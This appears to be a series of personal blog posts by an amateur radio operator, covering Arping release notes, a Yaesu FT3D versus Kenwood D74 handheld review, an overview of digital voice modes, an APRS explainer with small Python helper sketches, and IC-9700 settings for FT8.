  • Fix warnings and general code cleanup
  • Used coverity to find and fix suspicious code
  • Add some more stats to output
  • Print ‘Timeout’ when there’s no reply within one interval
  • Add ability to send gratuitous ARP
  • Add 802.1q VLAN support
  • Add more tests, and fuzzing
  • Drop priv user (all), capabilities (Linux), pledge() & unveil() (OpenBSD)
  • _BSD_SOURCE->_DEFAULT_SOURCE as the former is deprecated
  • Add payload data to mac ping
  • Add support for a dependency’s new way while falling back to the old way (e.g. Use pcap_create() instead of pcap_open_live())
  • Various small fixes for corner cases
  • Various small fixes to work around bugs in other libraries

For that last one it’s so that Arping won’t have strict version dependencies, and still work correctly. It’s better to have it just work, instead of bothering many people just because they haven’t (or can’t) upgrade a library.
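The "when available" pattern from the list (use the newer call if the platform has it, otherwise fall back) looks roughly like this. It's a Python sketch rather than Arping's C code, and the function name is hypothetical. The comment about wall-clock jumps is my understanding of the usual motivation for preferring a monotonic clock.

```python
import time


def interval_clock():
    """Return a timestamp suited to measuring intervals."""
    if hasattr(time, "clock_gettime") and hasattr(time, "CLOCK_MONOTONIC"):
        # Preferred: not affected by wall-clock adjustments.
        return time.clock_gettime(time.CLOCK_MONOTONIC)
    # Fallback: wall-clock time, which can jump if the system clock is changed.
    return time.time()


start = interval_clock()
time.sleep(0.01)
elapsed = interval_clock() - start
print("elapsed: %.3f s" % elapsed)
```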

There are many many users of Arping. If I can spend two hours working around a bug in some libpcap versions, to save 10 seconds for everyone who has such a config, then there only needs to be 720 affected people for that to have saved human effort, and life.

This is a tangent, but I wish more people would think of this fanout. If a slight perfection saves users just a few seconds, that can easily be worth a month of work. E.g. say you’re planning on sending out an email to your whole company of 20’000 people, because about half will need to do something. Let’s say it takes 10 seconds for the other half of users to see the email, click on it, and read enough to see that they don’t need to do anything. That’s 10*10000/3600=28 hours.

Do you think that if you spent less than 28 hours that you could maybe find out exactly which 10’000 people need to get this email? Can you spend another full week personalizing the email, so that it takes on average 10 seconds less to perform the needed action?

And actually, if you spend a full month on it, maybe this is something you can do without fanning out the work to 10k people?
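
The fanout arithmetic above can be written down as a small sketch. The function names are made up for illustration; the numbers are the ones from the text.

```python
def break_even_users(work_seconds: float, saved_seconds_per_user: float) -> float:
    """Number of affected users at which the up-front work pays for itself."""
    return work_seconds / saved_seconds_per_user


def fanout_hours(recipients: int, seconds_each: float) -> float:
    """Total human time, in hours, spent across all recipients."""
    return recipients * seconds_each / 3600


# Two hours of work, saving 10 seconds per affected Arping user.
print(break_even_users(2 * 3600, 10))       # 720.0
# 10'000 people each spending 10 seconds on an email they didn't need.
print(round(fanout_hours(10_000, 10), 1))   # 27.8
```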

Anyway, as can be seen from the list above even a tool that’s not changing much needs a bit of update every now and then, to still be good.

Arping 2.21 will deliver:

  • Use more modern pcap API calls, when available
  • Add payload data to mac ping
  • chdir(/) after chroot()
  • Misc minor cleanup. 23 commits in total.

Yaesu FT3D vs Kenwood D74


I’ve had a Kenwood TH-D74 for almost two years now, and was curious to get a sense of what the competition is like. Seems like everyone’s recommending the Yaesu FT3D. So I got one, and I think I’ve played around with it enough now to have an informed opinion.

To summarize the feel of them: while I have my complaints about the usability of the D74, the FT3D is like a time machine back to the 90s in how well the interface is thought through.

I’m sneaking in some mentions of the AnyTone 878UV too. But I’ve not used it enough to have a solid opinion yet.

Programming

With the FT3D upgrading the firmware is a two step process, where you have to flip a little hidden switch first to “up”, to upgrade one firmware, then to “down”, to upgrade the other. And then flip it back to “middle” for normal mode.

The FT3D programming software costs $25 and comes with a special cable, but the software also seems downloadable from their website. The USB cable seems to require a special driver. I guess that’s what you’re paying for. At least you can download the software and put the data on the SD card. But even then the way you do it is to press “Save”, and browse around the SD card looking for the BACKUP file, and overwrite that.

The D74 has none of this nonsense.

The software for neither radio is great. But the FT3D is the one that had the biggest gotcha: You can cut and paste, but if you cut more than one channel, and paste it somewhere else, then by default only the first channel is pasted. The others are lost, so you’ll have to key them in again.

The most annoying bug in the D74 programming software is that if you copy-paste a channel with 12.5kHz offset into a slot that has 5kHz stepping, then it’ll round that off, pasting the wrong frequency.

Programming directly on the FT3D is frustrating. The repeater offset is in one menu (CONFIG), tone in another (SIGNALING), and both require long-pressing DISP to bring up the menu. Programming directly on the D74 is a breeze.

Strangely specific HW for features

The FT3D camera feature seems like a good idea, until you realize that (as far as I can see) it can only be used with the external mic/camera, not just any camera. I’ve also tried putting a picture on the SD card, but I’ve been unable to send it. I press the Upload option to start browsing for pictures, but it does nothing. I’m guessing it is because the picture is the wrong format, or in the wrong place, or something like that. But it doesn’t seem documented, and no error message.

The only compatible camera to FT3D being the optional mic is as silly as with the D74 where you can only take a screenshot if you buy the external mic with the take-screenshot button.

The menu system is pretty much the same quality between the FT3D and D74. In other words not great. D74 has a strange division between D-Star features and “everything else”. Almost as if two different departments implemented them, and then they just slapped them together.

The FT3D has some strange menus too. For example would you expect TX power under CONFIG or OPTION? Nope, it’s under a special menu with an on-screen button labelled “F MW”. How about GPS logging? That’s under CONFIG. Ok, makes sense. Right next to turning the GPS on and off? Nope, that one’s under APRS. At least the C4FM and FM modes are not divided into two menu systems.

Buttons

D74 wins out on efficient operation, having many more physical buttons. It’s a design choice, sure. But does the FT3D really need a dedicated Wires-X button, a band button, and G/M button? Or could one of those have been a “menu” button so that the menu could be activated without a long press?

The FT3D side buttons are much nicer though. The D74 occasionally gets accidental PTT presses from me when I handle it clipped to my belt. I’ve not had that with the FT3D. The belt clip on the FT3D is better too. The key lock feature (also a side button) is much, much better on the FT3D. A simple click. On D74 it’s a two-button click that’s hard to do with gloves or with the protective case on.

Entering text

On the Yaesu typing a message is frustrating. Replying to a message means manually deleting the old message, because your reply is an edit of what you reply to. That’s just wrong.

And selecting a letter only sometimes progresses you to the next position. Normally after pressing “abc” three times and waiting you’ll get a “c”, with the cursor moved to the next spot. But not with the FT3D. You often have to press right arrow to advance. But you can’t do that to add a space. You have to press “space”, then right arrow. But… why?

Ports & attachments

FT3D uses mini-USB instead of D74’s micro-USB. Meh. They both have advantages.

The FT3D did not work with any of my 8GB SD cards. I had to switch to a 32GB one, which is a waste.

Seems you can’t charge and operate the FT3D. Plugging in while it’s on reboots into a “running off of AC” mode. Ok, I guess that’s fine. But if you’re in that mode and turn it off again, it goes into “no battery” mode, not into charging mode. So you have to unplug and replug the charger after that.

Charging issues can be a big deal. My Elecraft KX2 battery charger lights up green if the battery is connected (no matter what state of charge the battery is in), even if you forget to actually plug it into the wall. If you leave it for too long the charger will actually completely drain the battery, which is the opposite of what you wanted. If AC is not connected then the LED should be off. I reported this to Elecraft and they replied that they agree this isn’t great, but that’s how the charger they’re selling is.

Not fun to come out to the park only to find that the battery you thought you left charging overnight is flat.

APRS

The best band to use for APRS as a second VFO is A on D74, B on Yaesu. I prefer it to be B.

D74 has built in KISS TNC. Seems much easier as you only have to connect a USB cable to send/receive packets, as opposed to connecting analog TX/RX and PTT, and set up a software TNC.

Operating APRS, in addition to typing, is much nicer with quick access to functions via the extra buttons on the D74. E.g. raising the radio high above your head and beaconing out a couple of times is easier with it.

Manual

The Yaesu manual is full of typos. Including one screenshot that shows their own trademark, WIRES-X, as “WIRSE-X”.

It’s not as bad in this regard as the AnyTone 878UV manual, which in addition to typos also has the problem of being extremely minimal in what it covers.

Sound quality

After having listened a bunch to D-Star on D74, DMR on AnyTone 878, and C4FM on the FT3D, I think they’re about the same. D-Star seems to be more dependent on the implementation, where some people sound like robots and others sound great. I’ll make a separate blog post on the different digital systems at some point.

I know some people complain about the lack of volume from the FT3D, but it’s fine.

The AnyTone 878UV is famously loud. And yeah, it’s really loud if you turn it up.

RF Performance

Due to the pandemic I’ve not been able to compare much in the field. And I can’t reach any repeater from inside my flat.

I did some indoor tests though for reception. I set my USRP B200 to transmit a solid FM tone, and went into another room to pick up the signal with various radio configurations.

It’s very close, but it sounded like the FT3D was slightly better at picking up the tone. I’m not sure if this is because the speaker on the D74 seems to have more bass, and the bass noise might have drowned it out a bit. The general sound profile reproduction is different enough that my untrained ears can’t be sure. So call it mostly a tie.

They were both much better than the AnyTone 878UV, and my Baofengs. In fact I think the AnyTone was probably worst of all.

I tested both on 2M and 70cm, and swapped around antennas between the stock ones and a Diamond SRH940.

Again, I wouldn’t call these exhaustive or even objective tests. Ideally they should at least be done with headphones to remove the speaker from the equation.

I checked RF harmonics on VHF using a 200MHz/1Gsps oscilloscope (Hantek DSO4202P), and as expected saw no noticeable harmonics on FT3D, D74, or the AnyTone. The Baofengs were a different story, so I could confirm that the measurement method works.

Headphones

If you want to plug in normal headphones then unfortunately both of these radios make you build your own cable. The connector for mic/speaker is a combination one that also has PTT, so if you just plug them in you’ll start transmitting nonstop.

I’ve not yet built a cable for the FT3D, because at least for now I’m happy with the FT3D bluetooth support for headphones. The D74 bluetooth doesn’t work at all with my Bose QC35s, so there I have to use my custom cable.

Durability

The FT3D feels more sturdy. But on the other hand my D74 has had a couple of big bangs, including dropping 2 meters landing on a big rock, and has survived great with only a couple of scratches.

For any HT I recommend these paracord carabiners, to reduce the amount of droppage.

So which one should you buy?

Buy the one whose digital system you want access to. If your local repeaters are C4FM, get the FT3D. If you’re in D-Star land, get the D74.

For analog, I’d say the D74 is much nicer. Quick to program. APRS much nicer to operate both for position and messaging.


Amateur radio digital voice


It’s a mess.

This post is my attempt at a summary of amateur radio digital voice modes, and what I think of them.

I’m not an expert, so if you have more experience then your opinion is likely more valid than mine. But hopefully at least I’m getting the facts right. Please correct me where I’m mistaken.

Analog and digital voice

In the beginning there was only analog. Traditionally on HF you use SSB, and on VHF/UHF you use FM. Analog works, and while yes there are different modes, radios tend to support all of them, or at least the common ones (e.g. most VHF/UHF radios don’t support SSB, because most traffic there is FM). Usually HT traffic is VHF/UHF FM, and for SSB while there is LSB and USB, radios will support both.

But analog isn’t perfect. By going digital we can send metadata such as call signs, positions, and even pictures and files. And for audio quality digital will get rid of the static of analog noise. Digital works better for longer distances, uses less spectrum, and retains voice clarity much longer.

Yes, there’s a sharp cliff when digital voice modes can no longer reach. One second it sounds perfect, the next you can understand nothing. That’s the nature of digital. It works perfectly until it doesn’t work at all. But in the conditions where digital just barely works, analog is an awful mess of static where you only maybe can hear anything.

Digital also enables some fancy things I’ll describe, such as repeating across the Internet.

Analog amateur radio has EchoLink for doing similar things, but both because I’ve not used it, and because it’s not using digital modes, I won’t say more about that in this post.

Digital landscape

Here’s where the mess comes in.

There are four different standards, completely incompatible (but see below about the OpenSpot3).

DMR, D-Star, P25, and C4FM/SystemFusion.

I’ve not used P25, so I don’t have anything to say about it. The rest are very alike, but not quite the same.

For simplex (direct radio to radio) they’re pretty much exactly the same. They sound about the same, they work the same (switch from FM to the digital mode, done), and there are no surprises.

D-Star and SystemFusion were designed to be heavily protected by patents (some of which have now expired) and trade secrets, and because of this are heavily tied to the radio manufacturers.

D-Star radios are sold by Kenwood and Icom. C4FM/SystemFusion is sold by Yaesu.

DMR has more vendors.

All three of these systems, unlike analog amateur radio, require you to register your callsign on a website in order to use them fully. They’ll work in simplex without it, but e.g. for SystemFusion Yaesu requires you to register an account with them to get full use of the system, inputting both your callsign and your radio serial number.

The patents, trade secrets, and login requirements to me go very much against the spirit of amateur radio. And I’ve ranted about that before.

Digital mode repeaters don’t need to decode the voice. They simply repeat and route the data as-is. This means you can build a repeater or write a reflector (see below) without being able to decode the voice, but it still feels wrong.

There are other digital voice modes, such as FreeDV. I wish every handset would support FreeDV, but not only do you currently need a computer to do FreeDV (thus it’s a different thing from what I’m describing here), operationally it’s also less interesting. FreeDV is a solution for simplex, or repeaters. For operators it’s less of a “system” that needs explaining. Implementors just need a codec2 implementation and to read the very short FreeDV spec, and that’s it.

So that’s why I’m staying with DMR, D-Star and SystemFusion in this blog post.

DMR

DMR is popular because of its licensing situation with multiple manufacturers, which drives down prices.

DMR came out of commercial radio, and is a bit strange when used for amateur radio.

It has features that don’t make sense for amateur radio. E.g. a radio can be sent a “kill code”, to be remotely disabled. That makes sense if your security guard accidentally triggers their radio every two seconds by the way they walk, and HQ can shut that interference down centrally. But with amateur radio there is no “centrally”. Each amateur radio operator is their own licensee.

DMR radios are programmed more “closed”. The programming software is meant to be used by an expert to create a set of configurations for the whole organization to be distributed to all users in departments, and a config is called a “Code Plug”. So think of it as the security guards getting radios with the “security guard code plug”. It doesn’t have to be programmed that way, but this is the use case they’ve made natural.

Many DMR radios can’t be put in frequency mode. The AnyTone 878UV can, but funnily it can’t show the frequency and channel name at the same time. You have to go into the menus to switch to showing one or the other.

So the experience of using a DMR radio is one where the expectation is that you are just handed a radio, with channels programmed, and you are to use those channels because that’s what your organization is licensed to do.

So DMR doesn’t feel like amateur radio. Which makes sense. It came from commercial radio, where these choices made sense.

DMR uses limited TDMA. There are two time slots. And instead of the PL tones of analog repeaters, it uses “color codes”, numbered 0-15.

DMR repeaters connect to “servers”, which belong to “talk group” networks. Talk groups exist so that you can use the same repeater for your security guards as for your lighting crew, without them needing to hear each other. Pretty neat.

For amateur radio, talk groups use a global database (assuming your repeater is connected to a server in the BrandMeister system. There are others I think). You can see the full list of BrandMeister talk groups, but for example:

  • Talk group 1 is “the local repeater”
  • Talk group 91 is “World-wide”, and has lots of activity
  • Talk group 2411 is “SM Tactical” (SM for Sweden), whatever that means

You can set up to listen to multiple talk groups in a “receiver list”, when you’re tuned to a repeater. You won’t hear other talk groups when the repeater broadcasts them, unless you hold down the Monitor button if you have one. You also have a talk group set for when you push to talk (PTT). The active PTT talk group is implicitly in the receiver list.
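
As a rough sketch of that filtering rule (not how any particular radio firmware does it), the decision of whether you hear a transmission could be modelled like this. The `DmrChannel` class and its field names are hypothetical; talk group 235 is just an arbitrary group that is not in the list.

```python
from dataclasses import dataclass, field


@dataclass
class DmrChannel:
    """Hypothetical model of one programmed DMR channel."""
    ptt_talk_group: int
    receive_list: set[int] = field(default_factory=set)

    def is_heard(self, talk_group: int, monitor_held: bool = False) -> bool:
        # Holding Monitor bypasses the talk group filter entirely.
        if monitor_held:
            return True
        # The active PTT talk group is implicitly in the receive list.
        return talk_group == self.ptt_talk_group or talk_group in self.receive_list


channel = DmrChannel(ptt_talk_group=91, receive_list={1, 2411})
print(channel.is_heard(91))                      # True
print(channel.is_heard(235))                     # False
print(channel.is_heard(235, monitor_held=True))  # True
```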

The first time you PTT with a new talk group to a repeater, it will realize that someone (you) is interested in that talk group and will start “subscribing” to it and broadcast it for your enjoyment.

This PTT system means that there are many MANY kerchunkings on DMR talkgroups, which interferes with actual conversation.

DMR doesn’t transmit much metadata. You’re only identified with your DMR ID (remember to register), and every receiver has to be programmed with the now ~160000 DMR IDs for your call sign to show up when you talk to people.

There was no problem registering. Annoying that you have to, but not a problem. Annoying also that you have to periodically reprogram your radio to keep the list of ~160000 DMR IDs up to date.

D-Star

D-Star was designed by the Japan Amateur Radio League, so was for amateur radio from the beginning. At the time it was apparently not feasible to actually have an open standard, so the voice codec was a proprietary patented one, and you had to pay $25 for a chip to be able to encode/decode it.

There’s some open source code out there now, so maybe in the future more radios will get it. Though I don’t see Yaesu adding it, even if it’s free. They want to continue pushing their own closed system.

D-Star merges “servers” and “talk groups” into one thing, and calls it “reflectors”. So a repeater or hotspot is connected to a reflector, and that is the group that you are chatting with. Much simpler.

It’s polite to ask on the repeater if anyone minds if you link the repeater to another reflector (unlinking whatever reflector it’s currently linked to) before you key that in, but you can do it directly from your radio. Some repeaters may be locked to a specific reflector.

D-Star supports sending not only your call sign and name whenever you talk, but you can also embed your GPS coordinates if you want.

A popular reflector is “30 Charlie” (REF030C). There’s a full list of official reflectors, but there are other sets of reflectors too, and you can even run your own.

You need to register to get started. I think otherwise reflectors will drop your traffic, but I’m not sure. One problem with D-Star is that you’re supposed to register via your local repeater. But if you’re on a hotspot because you don’t have any repeaters nearby, then it can be hard to get registered.

I had my registration rejected because it was not local, but after complaining to various places eventually my registration went through. I don’t know who pressed what button to fix it, because people were not exactly good at replying to my emailed requests.

C4FM/SystemFusion

SystemFusion is very similar to D-Star. Just incompatible. It also uses reflectors.

SystemFusion seems to have a more advanced system for querying metadata though. This may be part of what Yaesu calls “WIRES-X”. When you’re in range of a repeater you can leave voice, text, or photo messages on it, retrieve news, and get a list of reflectors. A handheld radio is not exactly great for browsing things, but it’s there and seems kinda cool.

Other than that, yeah for operators it’s D-Star, but not compatible. Registration was not a problem, unlike with D-Star.

P25

I may fill in this section when I have first hand experience with it. For now I have nothing to say.

Hotspot

If you don’t have a repeater near where you live, or you want to surf around reflectors / talk groups like a madman, then you can get a little gateway into the talk group / reflector systems.

How it works is that you use your normal radio, but instead of talking to a repeater you talk to your own little mini-repeater, that is your gateway between the Internet and radio. I say “repeater” but it can’t be used to repeat between two radios, only between the Internet and your radio.

You can build a repeater using two hotspots connected to the same reflector, and running on different frequencies, but hotspots don’t have high power, so this may be of limited use.

There are others, but just get the OpenSpot3. It does all three systems, and (unlike every other hotspot, including OpenSpot2), it does cross mode! It also has a built in battery, so with its wifi on the internet side, and RF to your radio, it’s extremely handy.

With it you can have a DMR radio, and cross mode so that you’re talking to people on a D-Star reflector. Pretty magic!

I have the OpenSpot2, which doesn’t have a battery or cross mode, but even that one is very awesome.

Comparing digital modes

To me they sound about the same. D-Star seems to have more variability between implementations, where some sound more robotic.

DMR is weird. I understand it to be the most popular, but it’s always clear that amateur radio was not the primary design choice for it.

D-Star and SystemFusion are both closed systems, in my opinion. But other than that pretty equal. SystemFusion/WIRES-X has fancy mailboxes, as described above.

You should use the system that has repeaters nearby, or the same system your friends use.

APRS


Another post in my burst of amateur radio blog posts.

To say that the documentation for APRS is not great is an understatement. What should be the best source of information, aprs.org, is just a collection of angry rants by the inventor of APRS, angrily accusing implementations and operators of using his invention the wrong way. There’s no documentation about what the right way is, just that everyone is wrong.

So here I’ll attempt to write down what it is, in one place, in an effort to both teach others, and for people who know more than me to correct me.

The best source of APRS information for me has actually been Kenwood radio manuals. See resources at the bottom.

APRS in short

APRS is a way to send short pieces of digital information as packets of data. The messages are:

  • Status about you
    • Your position (optionally not exact)
    • Your heading
    • Your QSY (frequency you’re tuned to if someone wants to call)
  • Weather reports
  • Status about “items” and “objects”. These are things that are not you, and aren’t a radio. For example where the meeting point is, or a hurricane.
  • Short messages

The protocol

As an operator you don’t have to care much about what AX.25 is, or how it relates to X.25. But no explanation is complete without mentioning it.

As an operator there’s no need to read up much about this, so while I have links in this section, you don’t need to follow them.

AX.25 is a modified version of X.25 for Amateur radio operators. It can be used for “connections” just like dialing into a BBS, but APRS only uses connectionless packets. So I’ll say no more about “connections”.

Unless you’re programming your own implementation of APRS there’s no need to read the protocol specs. Suffice to say that APRS uses AX.25 connectionless packets for everything it does.

Block diagram of operating APRS

APRS diagram

Components:

  • GPS satellites send data to GPS receivers to tell them what time it is, and where they are.

  • A GPS receiver takes those signals and provides time and position coordinates

  • The APRS implementation periodically (or on demand, or using fancy algorithms to decide when) constructs position reports as AX.25 packets, and gives them to the TNC for transmission. Also the other types of packets, such as messages and object locations, are constructed here.

  • The TNC is a modem that turns packets into analog sounds. The digital side of the TNC uses an interface called KISS.

  • The radio takes the sounds and turns them into radiowaves.

  • WIDE1 digipeaters (repeaters of packets) are more local collectors of information, and repeat them so that they can be seen by a WIDE2 repeater.

  • WIDE2 digipeaters are in a position to cover a wider area, but are otherwise just like other digipeaters. Exactly how much WIDE1 & WIDE2 repeat a packet is described below.

  • An IGate is a digipeater that may not actually repeat your packet over radio, but reports to some place over the Internet. Eventually somehow (I’m not clear on exactly how) it’ll be visible on aprs.fi.

The receiving path is just the reverse path (except of course you don’t broadcast back to the GPS satellites).

Different radios require more or less extra hardware or software. See “How to send/receive APRS”, below.
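
To make the KISS interface between the APRS implementation and the TNC a bit more concrete, here is a minimal sketch of KISS framing. The special byte values (FEND, FESC, TFEND, TFESC) come from the KISS protocol; the function names are my own, the decoder assumes a single well-formed frame, and the payload here is dummy bytes, not a real AX.25 packet.

```python
FEND, FESC, TFEND, TFESC = 0xC0, 0xDB, 0xDC, 0xDD
DATA_FRAME_PORT0 = 0x00  # command byte: data frame on TNC port 0


def kiss_encode(ax25_frame: bytes) -> bytes:
    """Wrap a raw AX.25 frame in KISS delimiters, escaping special bytes."""
    out = bytearray([FEND, DATA_FRAME_PORT0])
    for byte in ax25_frame:
        if byte == FEND:
            out += bytes([FESC, TFEND])
        elif byte == FESC:
            out += bytes([FESC, TFESC])
        else:
            out.append(byte)
    out.append(FEND)
    return bytes(out)


def kiss_decode(kiss_frame: bytes) -> bytes:
    """Undo kiss_encode(). Assumes exactly one well-formed frame."""
    body = kiss_frame.strip(bytes([FEND]))[1:]  # drop delimiters and command byte
    out = bytearray()
    escaped = False
    for byte in body:
        if escaped:
            out.append(FEND if byte == TFEND else FESC)
            escaped = False
        elif byte == FESC:
            escaped = True
        else:
            out.append(byte)
    return bytes(out)


payload = bytes([0x01, 0xC0, 0xDB, 0x02])
encoded = kiss_encode(payload)
print(encoded.hex(" "))                 # c0 00 01 db dc db dd 02 c0
print(kiss_decode(encoded) == payload)  # True
```

With a radio that has a built in KISS TNC, bytes like these are what would go over the USB serial link.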

Packet path

An APRS packet sent out has a path. For a handheld it’s usually WIDE1-1,WIDE2-1. This means that it should be repeated by both WIDE1 and WIDE2 digipeaters, and that it should only be repeated once (per type).

To demonstrate the repeat counter I’ll use WIDE1-2,WIDE2-2. If your WIDE1-2,WIDE2-2 packet is seen by a WIDE1 digipeater, it’ll repeat it as WIDE1-1,WIDE2-2. The WIDE1 counter (the second number) was decreased by one. Let’s say it’s then picked up by a WIDE2 digipeater. It’ll rebroadcast as WIDE1-1,WIDE2-1 (the WIDE2 counter having now been decremented). Another WIDE2 repeater hears it, and repeats it as (I’m not sure) either WIDE1-1,WIDE2-0, or just WIDE1-1.

NOTE: I’m not sure about exactly the content of the PATH as it propagates, but that is the general idea of how the counter works.
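
With that caveat in mind, here is a toy model of the counter as described above. It only decrements the matching entry; it is a sketch of the idea, not of what a real digipeater writes into the path. The `digipeat` function is hypothetical, and it keeps a spent entry as `-0`, which is one of the two possibilities I mentioned.

```python
from typing import Optional


def digipeat(path: str, digipeater_alias: str) -> Optional[str]:
    """Return the path after one repeat, or None if this digipeater
    has no hops left to spend and should not repeat the packet."""
    hops = path.split(",")
    for i, hop in enumerate(hops):
        alias, _, count = hop.partition("-")
        if alias == digipeater_alias and count.isdigit() and int(count) > 0:
            # Spend one hop from the matching entry.
            hops[i] = f"{alias}-{int(count) - 1}"
            return ",".join(hops)
    return None


path = "WIDE1-2,WIDE2-2"
path = digipeat(path, "WIDE1")
print(path)                     # WIDE1-1,WIDE2-2
path = digipeat(path, "WIDE2")
print(path)                     # WIDE1-1,WIDE2-1
path = digipeat(path, "WIDE2")
print(path)                     # WIDE1-1,WIDE2-0
print(digipeat(path, "WIDE2"))  # None
```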

Actually WIDE2 digipeaters can simultaneously act as WIDE1, so if you only have WIDE1-1 in your path, and a WIDE2 digipeater hears it, it’ll still process and repeat it.

SSID

In order to support multiple radios per call sign, all sources and destinations are in the format of the callsign, a dash, and a number. This number is the SSID. E.g. I set M0THC-7 on my Kenwood D74, and M0THC-2 on my Yaesu FT3D. They don’t have to be different numbers, since when out in the field you’re probably not using two at the same time, so there will be no confusion.

Especially you won’t use two handheld radios in two different locations. If someone else is using your radio then they should program in their call sign, not yours, so you can use the same SSID.

I set different numbers because I often experiment with the two, and need to have different addresses for them, so that I can send messages between them.

The SSID is supposed to have meaning (e.g 5 is “smartphone”, 8 is “boats or maritime mobile”, 15 is “generic other”), but it’s just convention and you won’t break anything (to my knowledge) if you have to use the “wrong” SSID. There are enough “generic” SSIDs that you should be able to follow it though.
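
Splitting an address into call sign and SSID is simple enough to sketch. This assumes the AX.25 rule that the SSID is a number from 0 to 15, and that an address without a dash means SSID 0. The function name and the small lookup table (which only holds the three conventions mentioned above) are just for illustration.

```python
# Only the conventions mentioned in the text; the real list is longer.
SSID_CONVENTIONS = {
    5: "smartphone",
    8: "boats or maritime mobile",
    15: "generic other",
}


def parse_aprs_address(address: str) -> tuple[str, int]:
    """Split e.g. 'M0THC-7' into ('M0THC', 7)."""
    callsign, dash, ssid_text = address.partition("-")
    ssid = int(ssid_text) if dash else 0  # assumption: no dash means SSID 0
    if not 0 <= ssid <= 15:
        raise ValueError(f"SSID out of range 0-15: {ssid}")
    return callsign, ssid


print(parse_aprs_address("M0THC-7"))  # ('M0THC', 7)
print(parse_aprs_address("M0THC"))    # ('M0THC', 0)
print(SSID_CONVENTIONS.get(5))        # smartphone
```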

How to send/receive APRS

This depends on what hardware you have. If you have a radio with APRS and GPS support (e.g. Kenwood D74, Yaesu FT3D, AnyTone 878UV) then it can act as GPS receiver, APRS implementation, TNC, and radio all in one. Except the AnyTone can only send its position, not receive anything. See your manual for how to set that up. It’s a more or less pleasant experience, as I mentioned in my FT3D vs D74 review.

If you have a regular analog radio, such as Baofeng UV-5R, then from the diagram above it only implements the “Radio” bit. That’s fine, you don’t need more. You can run a software TNC such as Dire Wolf, which implements both APRS and the TNC.

You can set your radio to VOX, meaning it’ll start transmitting when the TNC sends audio to it. That way you don’t need to worry about pressing PTT to transmit.

Or you can use a Mobilinkd TNC, which connects to a “computer” (your phone, which has a GPS receiver) over bluetooth, and triggers PTT “properly” instead of using VOX.

The radio then simply takes the sound it’s provided, and broadcasts. And of course it works the other way too, it receiving the data for decoding by the TNC.

APRS is done on 144.800 MHz in most of the world. The US uses 144.390MHz, and some other places use other frequencies. That’s one piece of information that aprs.org actually does provide.

APRS over JS8Call

JS8Call is a great low power slow transmission digital messaging protocol usually run on HF frequencies. JS8Call is FT8 but made for doing more than just exchanging signal reports.

Specially formatted JS8Call messages are picked up by IGates and forwarded over the Internet. That way you can be in the middle of nowhere. Literally anywhere on the planet with a decent view of the sky, and if HF propagation is good enough that day and time of day, you should be able to send your position for aprs.fi to display.

Curiously though, when I send out my location it shows up wrong on aprs.fi. Not sure why, but it’s off by a bit.

So this sends APRS messages without encapsulating APRS in AX.25. An example of sending an APRS message over JS8Call is @ALLCALL APRS::M0THC-7 :hello{01} (the number of spaces matters). See this repo for how to construct these messages.
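
Since the spacing matters, here is a small sketch of building such a string. It assumes the usual APRS message rule that the addressee field is padded with spaces to exactly 9 characters, and that the part in braces is a message number. The function name is made up, and this is not taken from the repo mentioned above.

```python
def js8call_aprs_message(addressee: str, text: str, message_id: int) -> str:
    """Build the text to type into JS8Call for an APRS message."""
    if len(addressee) > 9:
        raise ValueError("APRS addressee must fit in 9 characters")
    # Assumption: addressee is left-justified and space-padded to 9 characters.
    return f"@ALLCALL APRS::{addressee:<9}:{text}{{{message_id:02d}}}"


print(repr(js8call_aprs_message("M0THC-7", "hello", 1)))
# '@ALLCALL APRS::M0THC-7  :hello{01}'
```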

Messages

Simple messages can be sent between APRS-capable handhelds by simply using their APRS addresses. E.g. I can send between my two handhelds by sending from M0THC-7 to M0THC-2. The message is retried a couple of times, until an acknowledgement is received.

Email

Like IGates repeating your position to the Internet, and WIDE1/WIDE2 digipeaters repeating over RF, there are special recipients that will forward your message through other mediums.

E.g. you can send short emails by sending a message to EMAIL-2. The message must begin with the destination email address, but you can teach EMAIL-2 about aliases by sending foo foo@bar.com, making foo an alias for foo@bar.com. A short alias makes you able to send slightly longer messages.

You can also receive emails (well, the subject line) this way, but only from addresses you’ve programmed in as aliases. In the example of foo above the email would be:

From: foo@bar.com
To: aprsemail2@ae5pl.net
Subject: M0THC-7:Hello this is the message

In the email body I must somewhere have exactly this:
  userid:foo:
The body of the email is not part of the message. It only needs to
contain the line above

So you can’t merely forward your emails to APRS. These are for short messages.

Sending SMS

Similarly you can send SMS via APRS. I’ve not tried it myself, yet. But there are videos on youtube.

Items and Objects

Aside from reporting your own position, you can also report the position of other things. This could be base camp (or another meetup point), or something that moves, like a storm or a car (without a radio, since a car with a radio can broadcast its own location).

APRS is a… not well designed protocol, at least by modern standards. It has “Items” and “Objects”, but the difference between them is only their semantic meaning. They’ll show up on most software exactly the same. The only technical difference is that Objects can have timestamps associated with them, and Items can’t. Both can have a course and speed, and other data associated with them.

The specs say that Objects are for moving objects, and Items are for “things that are occasionally posted on a map”. That… doesn’t actually mean anything. Essentially the Items/Objects distinction is a layer violation.

Messaging the International Space Station

VHF/UHF doesn’t have great reach. It only works line of sight (mostly true. There’s sporadic E but it’s… sporadic). VHF/UHF gets its reach through repeaters, or for APRS that’s digipeaters. But you need line of sight to the digipeater, and a path to your recipient.

This is where satellites come in, and in particular the International Space Station (ISS).

You can bounce messages off of the ISS. It has a digipeater. It’s not on the standard APRS frequency, but on 145.825 MHz. This way you can reach really far in one hop.

Sure, terrestrial digipeaters with a correctly configured PATH can reach very far too, but bouncing on the ISS is a different level of cool.

I’ve not done this yet though.

Digital APRS

Everything described in this post is “analog APRS”. “Digital APRS” is a term for putting the data in another digital protocol (such as DMR), and sending your position that way.

Probably the JS8Call APRS above would be classified as “digital APRS”.

To learn more, here are the resources I’ve found useful

FT8 and IC9700

Setup

The basis for these instructions is this guide, but updated to reflect that the IC9700 is now directly supported by wsjtx and js8call.

Step one: connect a normal USB-A-B cable between the computer and the radio.

IC-9700 settings

  • Menu
    • Set
      • Connectors
        • MOD Input
          • USB Mod Level: 30% (default 50%)
          • DATA MOD: USB (default: ACC)
          • DATA OFF MOD: Leave as default (MIC, ACC)
        • CI-V
          • CI-V Baud Rate = 19200 (default: Auto)
          • CI-V address = keep default A2h
          • CI-V USB Port = Link to [REMOTE] (default: Unlink from [REMOTE])
          • CI-V DATA Baud Rate = 19200 (default: OFF)
  • When running, choose FIL1 (next to the mode in the top left)

wsjtx/js8call settings

  • Radio
    • Rig: Icom IC-9700
    • Baud rate: 19200 (must match the CI-V Baud Rate set on the radio)
    • Data bits: 8
    • Stop bits: 1
    • Handshake: XON/XOFF
    • PTT method: CAT
